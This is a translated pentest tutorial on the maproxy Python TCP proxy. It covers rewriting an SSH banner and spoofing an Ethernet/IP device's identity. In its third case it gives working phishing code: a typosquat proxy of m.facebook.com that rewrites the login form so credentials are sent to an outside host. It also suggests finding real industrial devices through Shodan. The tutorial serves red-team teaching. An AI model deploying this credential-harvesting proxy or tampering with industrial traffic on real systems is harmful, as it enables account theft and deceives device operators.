Modifying network data on the fly

This translation of the article was prepared on the eve of the start of the course "Pentest. Penetration test practice".


Introduction

Various kinds of security assessments, from penetration tests and Red Team operations to attacks on IoT/ICS devices and SCADA systems, involve working with binary network protocols, that is, intercepting and modifying network data between the client and the target. Sniffing network traffic is not a hard task, since we have tools such as Wireshark, Tcpdump or Scapy, but modification looks like a much more laborious job, because we need some kind of interface that lets us read the network data, filter it, change it on the fly and send it on to the target host in almost real time. In addition, it would be nice if such a tool could handle many parallel connections and could be customised with scripts.

One day I came across a tool called maproxy, and its documentation quickly made it clear to me that maproxy is exactly what I needed. It is a simple, versatile and easily configurable TCP proxy. I tested the tool against several fairly demanding applications, including ICS devices (which generate a lot of packets), to see whether it could cope with many parallel connections, and it performed well.

This article introduces you to modifying network data on the fly using maproxy.

Description

The maproxy tool is built on Tornado, a popular and mature asynchronous networking framework for Python.

In general, it can operate in several modes:

  • TCP:TCP - an unencrypted TCP connection;
  • TCP:SSL and SSL:TCP - encryption on one side only;
  • SSL:SSL - encryption on both sides.

It is shipped as a library. To get started quickly, you can use the example files, which demonstrate the main functions of the library:

  • all.py
  • certificate.pem
  • logging_proxy.py
  • privatekey.pem
  • ssl2ssl.py
  • ssl2tcp.py
  • tcp2ssl.py
  • tcp2tcp.py

Case 1 - a simple bidirectional proxy

Taking tcp2tcp.py as the basis:

#!/usr/bin/env python

import tornado.ioloop
import maproxy.proxyserver

# forward every accepted connection to the SSH server on localhost:22
server = maproxy.proxyserver.ProxyServer("localhost", 22)
# accept client connections on port 2222
server.listen(2222)
# hand control to Tornado's event loop
tornado.ioloop.IOLoop.instance().start()

By default ProxyServer() takes two arguments: the address to connect to and the server port. server.listen() takes one argument: the port on which to listen for incoming connections.

Run the script:

# python tcp2tcp.py

To test it, we connect to the local SSH server through our proxy script, which listens on port 2222/tcp and connects to the standard SSH server port 22/tcp.

The welcome banner shows that our example script has successfully proxied the network traffic.

Case 2 - data modification

Another demo script, logging_proxy.py, is ideal for interacting with network data. The comments in the file describe the class methods you can override to achieve your goal.

The most interesting methods here are:

  • on_c2p_done_read - intercepts data on its way from the client to the server;
  • on_p2s_done_read - the reverse direction.

Let's try to change the SSH banner that the server returns to the client:

[…]
    def on_p2s_done_read(self, data):
        # data is bytes: bytes literals keep this working on Python 3 as well
        data = data.replace(b"OpenSSH", b"DumnySSH")
        super(LoggingSession, self).on_p2s_done_read(data)
[…]
# the session factory is what makes the proxy use our LoggingSession
server = maproxy.proxyserver.ProxyServer("localhost", 22, session_factory=LoggingSessionFactory())
server.listen(2222)
[…]

Run the script. As you can see, the client was misled, because the SSH server name it received was changed to «DumnySSH».
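One caveat that the plain replace() call glosses over is chunking: each call of the read hook sees exactly one socket read, so a pattern that happens to be split across two reads is never matched. The following is an added example, not code from the original article or from the maproxy project; the StreamRewriter class, the rewrite_chunks() helper and the two sample chunks are our own, and the constructed banner stands in for a real server response. It holds back only the bytes that could be the beginning of a match and forwards everything else at once.

```python
"""Chunk-safe byte rewriting for a proxy read hook (added example).

The on_c2p_done_read()/on_p2s_done_read() hooks receive whatever a single
socket read returned, so a pattern such as b"OpenSSH" may be split across
two consecutive chunks and a plain data.replace() on each chunk misses it.
StreamRewriter keeps back only a suffix that is a proper prefix of some
pattern and forwards everything else immediately. Names are our own.
"""


class StreamRewriter:
    """Applies (pattern, replacement) byte rules to a stream fed in chunks."""

    def __init__(self, rules):
        # rules: iterable of (pattern, replacement) byte strings, applied in order
        self.rules = [(bytes(old), bytes(new)) for old, new in rules]
        if any(len(old) == 0 for old, _ in self.rules):
            raise ValueError("empty search pattern")
        self.buf = b""

    def _held_back(self):
        """Length of the longest suffix of buf that is a proper prefix of a pattern."""
        best = 0
        for old, _ in self.rules:
            for k in range(min(len(old) - 1, len(self.buf)), best, -1):
                if self.buf.endswith(old[:k]):
                    best = k
                    break
        return best

    def feed(self, chunk):
        """Take one chunk as read from the socket; return the bytes safe to forward now."""
        self.buf += chunk
        for old, new in self.rules:
            self.buf = self.buf.replace(old, new)
        # Bytes that might be the start of a pattern continued in the next
        # chunk stay in buf. A replacement whose tail overlaps a pattern start
        # is re-scanned next time; harmless for OpenSSH -> DumnySSH, but keep
        # it in mind for rules where the replacement contains the pattern.
        keep = self._held_back()
        cut = len(self.buf) - keep
        out, self.buf = self.buf[:cut], self.buf[cut:]
        return out

    def flush(self):
        """Return whatever is still held back; call this when the peer closes the stream."""
        out, self.buf = self.buf, b""
        return out


def rewrite_chunks(chunks, rules):
    """Run a sequence of chunks through one StreamRewriter (for tests or offline captures)."""
    rw = StreamRewriter(rules)
    return b"".join(rw.feed(c) for c in chunks) + rw.flush()


# Constructed sample of server-to-client data: the SSH banner arrives in
# two reads with the pattern split across them.
SAMPLE_CHUNKS = [b"SSH-2.0-OpenS", b"SH_8.9p1 Ubuntu-3\r\n"]
BANNER_RULES = [(b"OpenSSH", b"DumnySSH")]

# How the rewriter would sit in the article's LoggingSession (not executed
# here; one rewriter must be created per connection, e.g. in __init__):
#
#   def on_p2s_done_read(self, data):
#       super(LoggingSession, self).on_p2s_done_read(self.rewriter.feed(data))

if __name__ == "__main__":
    print(rewrite_chunks(SAMPLE_CHUNKS, BANNER_RULES))
```

For the banner this costs nothing in practice: the server's next packet follows immediately, so held-back bytes are released right away, and flush() covers the case where the stream closes while a partial match is pending.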

Case 3 - a simple phishing web page

There are countless ways to use this tool. This time let's look at something practical from the Red Team side of operations. Let's imitate the m.facebook.com landing page and use a custom domain with a deliberate typo, for example m.facebok.com. For the purposes of the demonstration, let's simply assume that the domain is registered to us.

We will set up an unencrypted network connection between the victim and the proxy and an SSL stream to the Facebook server (31.13.81.36). To make this example work we have to replace the HTTP Host header and inject the proper hostname, and we will also disable response compression so that the content is easy to get at. Finally, we will replace the HTML form so that the login credentials are sent to us instead of to Facebook's servers:

[…]
    def on_c2p_done_read(self, data):
        # replace Host header
        data = data.replace(b"Host: m.facebok.com", b"Host: m.facebook.com")
        # disable compression
        data = data.replace(b"gzip", b"identity;q=0")
        data = data.replace(b"deflate", b"")
        super(LoggingSession, self).on_c2p_done_read(data)
[…]
    def on_p2s_done_read(self, data):
        # partial replacement of response
        data = data.replace(b'action="/sn/login/"', b'action="https://redteam.pl/"')
        super(LoggingSession, self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("31.13.81.36", 443, session_factory=LoggingSessionFactory(), server_ssl_options=True)
server.listen(80)
[…]

To sum up: as the result shows, we managed to substitute the original site.

Case 4 - Ethernet/IP modification

I have been working with industrial devices and software (ICS/SCADA) for quite a long time: programmable logic controllers (PLC), I/O modules, drives, relays, ladder programming environments and much more. This case is for fans of industrial equipment. Hacking such solutions involves a lot of active play with network protocols. In the following example I want to show how you can modify ICS/SCADA network traffic.

For this you will need the following:

  • a network sniffer, for example Wireshark;
  • an Ethernet/IP (EIP) device, which you can find with the Shodan service;
  • our script based on maproxy.

First, let's look at what a standard identification response from CIP (Common Industrial Protocol) looks like.

Device identification is performed over the Ethernet/IP protocol, an adaptation of Ethernet for industrial use that encapsulates control protocols such as CIP. We will change the highlighted identity name, "NI-IndComm for Ethernet", using our proxy script. We can again reuse the logging_proxy.py script and, in the same way as before, modify the on_p2s_done_read class method, since we want the client to see a different identity name.

Code:

[…]
    def on_p2s_done_read(self, data):
        # partial replacement of response

        # check whether this is a List Identity response (item type 0x000C, little-endian)
        if data[26:28] == b'\x0c\x00':
            print('Got response, replacing')
            # overwrite the first 10 bytes of the product name with a 10-byte string
            data = data[:63] + 'DUMMY31337'.encode('utf-8') + data[63 + 10:]
        super(LoggingSession, self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("1.3.3.7", 44818, session_factory=LoggingSessionFactory())
server.listen(44818)
[…]

In fact, we requested the device identification twice: the second response is the original one, and the first was modified on the fly.
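The slice arithmetic above only works while the replacement has exactly the length of the bytes it overwrites; a longer or shorter name would leave the encapsulation length, the item length and the name-length byte inconsistent, and a well-behaved client would reject the packet. The following is an added example, not code from the original article or from the maproxy project: it parses the Ethernet/IP encapsulation header and the List Identity item, validates the offsets instead of trusting them, and updates every length field when the product name is replaced. The same parser serves for inspecting captured identity responses. The sample response and all vendor, serial and address values in it are constructed, and the function names are our own.

```python
"""Length-aware parsing and rewriting of an Ethernet/IP List Identity response.

Added example. Offsets follow the ODVA encapsulation layout:
24-byte header, item count, then the 0x000C identity item whose body holds
protocol version, sockaddr, vendor/type/code, revision, status, serial,
product name length, product name and state. All sample values are made up.
"""
import struct

ENCAP_HDR_LEN = 24            # command, length, session, status, sender context, options
CMD_LIST_IDENTITY = 0x0063
ITEM_LIST_IDENTITY = 0x000C   # item type id; little-endian it reads b"\x0c\x00" at offset 26
ITEM_BODY_OFFSET = 30         # header + item count (2) + item type (2) + item length (2)
NAME_LEN_OFFSET = 62          # body + version(2) + sockaddr(16) + vendor/type/code(6) + rev(2) + status(2) + serial(4)
NAME_OFFSET = 63


def build_list_identity_response(product_name):
    """Construct a sample List Identity response (constructed vendor/serial/address values)."""
    name = product_name.encode("ascii")
    body = struct.pack("<H", 1)                                                     # encapsulation protocol version
    body += struct.pack(">HH4s8s", 2, 44818, b"\xc0\xa8\x01\x0a", b"\x00" * 8)      # sockaddr_in, big-endian per spec
    body += struct.pack("<HHHBBHIB", 0x0001, 0x000C, 0x0001, 1, 2, 0x0030, 0x01020304, len(name))
    body += name + b"\x00"                                                          # product name, state
    item = struct.pack("<HH", ITEM_LIST_IDENTITY, len(body)) + body
    payload = struct.pack("<H", 1) + item                                           # item count = 1
    header = struct.pack("<HHII8sI", CMD_LIST_IDENTITY, len(payload), 0, 0, b"\x00" * 8, 0)
    return header + payload


def parse_list_identity(data):
    """Return the product name and length fields, or None if this is not a well-formed List Identity response."""
    if len(data) < NAME_OFFSET + 1:
        return None
    cmd, encap_len = struct.unpack_from("<HH", data, 0)
    if cmd != CMD_LIST_IDENTITY or len(data) < ENCAP_HDR_LEN + encap_len:
        return None
    item_count, item_type, item_len = struct.unpack_from("<HHH", data, ENCAP_HDR_LEN)
    if item_count < 1 or item_type != ITEM_LIST_IDENTITY:
        return None
    name_len = data[NAME_LEN_OFFSET]
    # the name plus the trailing state byte must fit inside the item
    if NAME_OFFSET + name_len + 1 > ITEM_BODY_OFFSET + item_len:
        return None
    return {
        "name": bytes(data[NAME_OFFSET:NAME_OFFSET + name_len]),
        "encap_len": encap_len,
        "item_len": item_len,
    }


def rewrite_product_name(data, new_name):
    """Replace the product name and fix every length field; anything else is returned unchanged."""
    info = parse_list_identity(data)
    if info is None:
        return data
    new = new_name.encode("ascii")
    if len(new) > 255:
        raise ValueError("product name is limited to 255 bytes")
    delta = len(new) - len(info["name"])
    out = bytearray(data)
    out[NAME_OFFSET:NAME_OFFSET + len(info["name"])] = new
    out[NAME_LEN_OFFSET] = len(new)
    struct.pack_into("<H", out, ENCAP_HDR_LEN + 4, info["item_len"] + delta)   # item length
    struct.pack_into("<H", out, 2, info["encap_len"] + delta)                  # encapsulation length
    return bytes(out)


# Inside the article's LoggingSession this replaces the fixed slice arithmetic
# (not executed here; like the article's code it assumes the whole response
# arrives in a single read):
#
#   def on_p2s_done_read(self, data):
#       super(LoggingSession, self).on_p2s_done_read(rewrite_product_name(data, "DUMMY31337"))

if __name__ == "__main__":
    sample = build_list_identity_response("NI-IndComm for Ethernet")
    print(parse_list_identity(rewrite_product_name(sample, "DUMMY31337 for Ethernet")))
```

Because the rewrite changes the encapsulation length in the header, the code only touches packets whose command, item type and name length all check out; anything else, including the client's own List Identity request, passes through untouched.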

And finally

In my opinion maproxy is a simple and convenient tool, which on top of that is written in Python, so I believe you too can benefit from using it. Yes, there are other, more sophisticated tools for modifying and manipulating network data, but they also demand more attention and are often built for a single use case, for example Muraena, Modlishka or evilginx for cases like the third one, or canape for the last one. One way or another, with maproxy you can quickly implement your own ideas for intercepting network data, since the example scripts are very clear.


Source: www.habr.com
